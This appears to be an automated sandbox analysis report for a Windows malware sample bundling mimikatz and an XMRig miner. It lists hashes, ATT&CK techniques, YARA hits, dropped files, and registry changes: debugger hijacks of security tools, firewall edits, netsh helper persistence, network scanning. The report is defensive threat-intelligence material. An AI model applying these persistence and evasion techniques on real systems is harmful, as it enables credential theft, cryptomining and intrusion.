mimikatz | d9ae5086781b0b6e91058b8b83761dce3e37b3d798d6add7b7828b1c1ae73bb7

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2024 09:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe
Size

8.8MB
MD5

35f222d92a10a73cb88b11e638dc246b
SHA1

b29d06df01ebfff935e9a0afe93098d56d962128
SHA256

d9ae5086781b0b6e91058b8b83761dce3e37b3d798d6add7b7828b1c1ae73bb7
SHA512

fabcf06bb01edafb2bc2ae85947bb58641071c3580316dddfd5d964004b33d4f48c0b76172b354b0140ba359244273c69366c971fb35aca149c3ee83e8998d8b
SSDEEP

196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

biebucb.exe

description	pid	Process	procid_target
PID 4744 created 2096	4744	biebucb.exe	38

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (28592) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 12 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5040-127-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-132-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-149-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-160-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-171-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-180-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-211-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-218-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-224-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-241-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-242-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig
behavioral2/memory/5040-244-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3720-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3720-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0007000000023c88-6.dat	mimikatz
behavioral2/memory/2400-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4312-88-0x00007FF774E50000-0x00007FF774F3E000-memory.dmp	mimikatz

Drops file in Drivers directory 2 IoCs

Processes:

biebucb.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	biebucb.exe
File created	C:\Windows\system32\drivers\etc\hosts	biebucb.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

Processes:

biebucb.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	biebucb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	biebucb.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
372	netsh.exe
4116	netsh.exe

Executes dropped EXE 29 IoCs

Processes:

biebucb.exebiebucb.exewpcap.exelvnuplabi.exevfshost.exectkyggczb.exexohudmc.exenspfoo.exeiljmvq.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exectkyggczb.exebiebucb.exectkyggczb.exectkyggczb.exeiiqtmdpdb.exebiebucb.exe

pid	Process
2400	biebucb.exe
4744	biebucb.exe
3932	wpcap.exe
3076	lvnuplabi.exe
4312	vfshost.exe
2336	ctkyggczb.exe
4188	xohudmc.exe
2860	nspfoo.exe
5040	iljmvq.exe
4460	ctkyggczb.exe
2176	ctkyggczb.exe
1920	ctkyggczb.exe
3172	ctkyggczb.exe
3452	ctkyggczb.exe
4900	ctkyggczb.exe
1516	ctkyggczb.exe
3820	ctkyggczb.exe
4212	ctkyggczb.exe
3120	ctkyggczb.exe
4460	ctkyggczb.exe
4956	ctkyggczb.exe
2324	ctkyggczb.exe
3832	ctkyggczb.exe
4916	ctkyggczb.exe
4920	biebucb.exe
3064	ctkyggczb.exe
1608	ctkyggczb.exe
2336	iiqtmdpdb.exe
1572	biebucb.exe

Loads dropped DLL 3 IoCs

Processes:

lvnuplabi.exe

pid	Process
3076	lvnuplabi.exe
3076	lvnuplabi.exe
3076	lvnuplabi.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
86	ifconfig.me
87	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 13 IoCs

Processes:

biebucb.exexohudmc.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\nspfoo.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF	biebucb.exe
File created	C:\Windows\SysWOW64\nspfoo.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	biebucb.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	biebucb.exe

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023cdc-84.dat	upx
behavioral2/memory/4312-85-0x00007FF774E50000-0x00007FF774F3E000-memory.dmp	upx
behavioral2/memory/4312-88-0x00007FF774E50000-0x00007FF774F3E000-memory.dmp	upx
behavioral2/files/0x0007000000023ce7-91.dat	upx
behavioral2/memory/2336-92-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/2336-110-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/files/0x0007000000023ce4-113.dat	upx
behavioral2/memory/5040-115-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/4460-121-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/2176-125-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/5040-127-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/1920-130-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/5040-132-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/3172-135-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/3452-139-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/4900-143-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/1516-147-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/5040-149-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/3820-152-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/4212-156-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/5040-160-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/3120-161-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/4460-165-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/4956-169-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/5040-171-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/2324-174-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/3832-178-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/5040-180-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/4916-183-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/3064-191-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/1608-195-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp	upx
behavioral2/memory/5040-211-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/5040-218-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/5040-224-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/5040-241-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/5040-242-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx
behavioral2/memory/5040-244-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp	upx

Drops file in Windows directory 60 IoCs

Processes:

biebucb.execmd.exeiiqtmdpdb.exe2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe

description	ioc	Process
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\docmicfg.exe	biebucb.exe
File created	C:\Windows\ime\biebucb.exe	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\crli-0.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\tibe-2.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\vimpcsvc.exe	biebucb.exe
File opened for modification	C:\Windows\ivwjddbm\spoolsrv.xml	biebucb.exe
File opened for modification	C:\Windows\ivwjddbm\svschost.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\cttnbjmli\wpcap.exe	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\xdvl-0.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\cttnbjmli\wpcap.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\trch-1.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\vimpcsvc.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\svschost.xml	biebucb.exe
File created	C:\Windows\ivwjddbm\schoedcl.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\libxml2.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\svschost.xml	biebucb.exe
File opened for modification	C:\Windows\yvccbdwlz\Corporate\log.txt	cmd.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\ucl.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\Corporate\mimilib.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\posh-0.dll	biebucb.exe
File created	C:\Windows\ivwjddbm\vimpcsvc.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\cttnbjmli\Packet.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\coli-0.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\Corporate\mimidrv.sys	biebucb.exe
File opened for modification	C:\Windows\yvccbdwlz\cttnbjmli\Result.txt	iiqtmdpdb.exe
File created	C:\Windows\yvccbdwlz\cttnbjmli\lvnuplabi.exe	biebucb.exe
File created	C:\Windows\ivwjddbm\spoolsrv.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\spoolsrv.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\vimpcsvc.xml	biebucb.exe
File opened for modification	C:\Windows\ivwjddbm\vimpcsvc.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\AppCapture64.dll	biebucb.exe
File opened for modification	C:\Windows\yvccbdwlz\cttnbjmli\Packet.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\trfo-2.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\docmicfg.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\spoolsrv.xml	biebucb.exe
File created	C:\Windows\ivwjddbm\svschost.xml	biebucb.exe
File created	C:\Windows\ivwjddbm\docmicfg.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\tucl-1.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\svschost.exe	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\schoedcl.exe	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\AppCapture32.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\Corporate\vfshost.exe	biebucb.exe
File created	C:\Windows\yvccbdwlz\upbdrjv\swrpwe.exe	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\exma-1.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\zlib1.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\docmicfg.xml	biebucb.exe
File opened for modification	C:\Windows\ivwjddbm\schoedcl.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\Shellcode.ini	biebucb.exe
File created	C:\Windows\ivwjddbm\biebucb.exe	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\spoolsrv.exe	biebucb.exe
File created	C:\Windows\yvccbdwlz\cttnbjmli\ip.txt	biebucb.exe
File created	C:\Windows\yvccbdwlz\cttnbjmli\scan.bat	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\libeay32.dll	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\ssleay32.dll	biebucb.exe
File opened for modification	C:\Windows\ivwjddbm\biebucb.exe	2024-10-17_35f222d92a10a73cb88b11e638dc246b_hacktools_icedid_mimikatz.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\cnli-1.dll	biebucb.exe
File opened for modification	C:\Windows\ivwjddbm\docmicfg.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\cttnbjmli\iiqtmdpdb.exe	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\specials\schoedcl.xml	biebucb.exe
File created	C:\Windows\yvccbdwlz\UnattendGC\schoedcl.xml	biebucb.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid	Process
2400	sc.exe
3836	sc.exe
1272	sc.exe
4316	sc.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
